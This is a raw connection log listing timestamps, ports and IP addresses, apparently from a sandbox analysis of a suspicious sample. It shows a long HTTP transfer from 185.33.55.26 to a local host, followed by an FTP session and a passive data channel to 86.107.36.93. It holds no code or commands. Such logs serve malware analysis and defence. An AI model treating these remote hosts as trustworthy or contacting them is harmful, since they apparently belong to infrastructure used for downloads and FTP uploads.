Dec 2, 2024 11:36:12.407862902 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.407907009 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.407952070 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.407993078 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.410482883 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.410495043 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.410532951 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.416011095 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.416050911 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.416127920 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.416187048 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.421178102 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.421221018 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.421284914 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.421320915 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.426517963 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.426567078 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.426631927 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.426666975 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.431881905 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.431931019 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.431974888 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.432013988 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.437271118 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.437345982 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.437372923 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.437414885 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.442575932 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.442636013 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.442671061 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.442713022 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.448024035 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.448069096 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.448147058 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.448187113 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.453293085 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.453332901 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.453542948 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.453583002 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.458640099 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.458688021 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.458795071 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.458833933 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.464015007 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.464067936 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.464095116 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.464138985 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.469369888 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.469423056 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.469553947 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.469597101 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.474699974 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.474750042 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.474809885 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.474850893 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.480077982 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.480139017 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.480200052 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.480258942 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.484262943 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.484306097 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.484375954 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.484411955 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.488446951 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.488492966 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.488521099 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.488565922 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.492419004 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.492479086 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.492564917 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.492618084 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.496382952 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.496433973 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.496490002 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.496530056 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.500361919 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.500407934 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.500488043 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.500526905 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.504348993 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.504395008 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.504431009 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.504486084 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.508315086 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.508371115 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.508421898 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.508461952 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.512234926 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.512280941 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.512368917 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.512413025 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.515902996 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.515953064 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.515990019 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.516036034 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.519469976 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.519515038 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.519597054 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.519638062 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.522886992 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.522931099 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.523062944 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.523102045 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.526259899 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.526315928 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.526324987 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.526382923 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.529715061 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.529769897 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.529891014 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.529934883 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.533123970 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.533174992 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.533210039 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.533252954 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.536607981 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.536674023 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.536701918 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.536762953 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.539833069 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.539891958 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.539923906 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.539971113 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.599798918 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.599852085 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.599891901 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.599932909 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.600799084 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.600841999 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.600908041 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.600946903 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.602897882 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.602952003 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.603657961 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.603754044 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.603770018 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.603813887 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.605971098 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.606013060 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.606049061 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.606089115 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.608045101 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.608086109 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.608128071 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.608166933 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.610024929 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.610073090 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.610074043 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.610110998 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.612219095 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.612257957 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.612312078 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.612361908 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.614211082 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.614250898 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.614320993 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.614360094 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.616296053 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.616333008 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.616338968 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.616369963 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.618383884 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.618427038 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.618484974 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.618525982 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.620629072 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.620676041 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.620742083 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.620832920 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.622503042 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.622553110 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.622684002 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.622814894 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.624547958 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.624588966 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.624653101 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.624695063 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.626688004 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.626739025 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.626923084 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.626965046 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.628418922 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.628530979 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.628535032 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.628570080 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.630460978 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.630501032 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.630546093 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.630585909 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.632445097 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.632489920 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.632615089 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.632661104 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.634289026 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.634332895 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.634387970 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.634423018 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.636199951 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.636245012 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.636327982 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.636373043 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.638107061 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.638154030 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.638238907 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.638282061 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.640010118 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.640052080 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.640124083 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.640166998 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.641926050 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.641964912 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.642035961 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.642076015 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.643840075 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.643887043 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.643950939 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.644000053 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.645739079 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.645781994 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.645848989 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.645921946 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.647612095 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.647655964 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.647726059 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.647768021 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.649481058 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.649523973 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.649544001 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.649580002 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.651355982 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.651407003 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.651441097 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.651482105 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.653193951 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.653237104 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.653281927 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.653325081 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.655030012 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.655092955 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.655128002 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.655168056 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.656820059 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.656877995 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.656908035 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.656968117 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.658680916 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.658724070 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.658766985 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.658807039 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:12.660415888 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:36:12.660456896 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Dec 2, 2024 11:36:14.620249987 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:14.740334988 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:14.740664959 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:15.976186037 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:15.976421118 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:16.096420050 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:16.401093960 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:16.401365995 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:16.521436930 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:16.883939981 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:16.884299994 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:17.004460096 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:17.314496040 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:17.314687967 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:17.434612036 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:17.739521027 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:17.739729881 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:17.859668970 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:18.172656059 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:18.172842026 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:18.483267069 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:18.535564899 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:18.603463888 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:18.840609074 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:18.841341019 CET | 49738 | 35334 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:18.889482021 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:18.961319923 CET | 35334 | 49738 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:18.961420059 CET | 49738 | 35334 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:18.961505890 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:19.081429005 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:20.105631113 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
